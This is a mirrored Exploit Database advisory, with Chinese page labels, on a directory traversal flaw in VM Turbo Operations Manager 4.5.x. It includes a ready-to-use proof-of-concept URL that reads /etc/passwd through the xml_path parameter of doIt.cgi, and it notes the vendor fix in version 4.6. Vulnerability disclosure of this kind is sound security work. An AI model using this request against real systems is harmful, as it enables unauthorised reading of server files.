VM Turbo Operations Manager 4.5x – Directory Traversal

• Exploit Database
• 14 阅读

• 作者： Jamal Pecou
  日期： 2014-05-12
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/33334/

• Product: VM Turbo Operations Manager
  Vendor: VM Turbo
  Vulnerable Version(s): 4.5.x earlier
  Tested Version: 4.0
  Advisory Publication: April 11, 2014 
  Vendor Notification: April 11, 2014 
  Public Disclosure: May 8, 2014 
  Vulnerability Type: Directory Traversal
  
  Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )
  
  ------------------------------------------------------------------------
  -----------------------
  
  Advisory Details:
  
  A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file. 
  
  
  The following exploitation example displays the contents of /etc/passwd
  
  http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
  
  ------------------------------------------------------------------------
  -----------------------
  
  Solution:
  
   The vendor has released a fix for this vulnerability in version 4.6.
  
  References:
  
  [1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement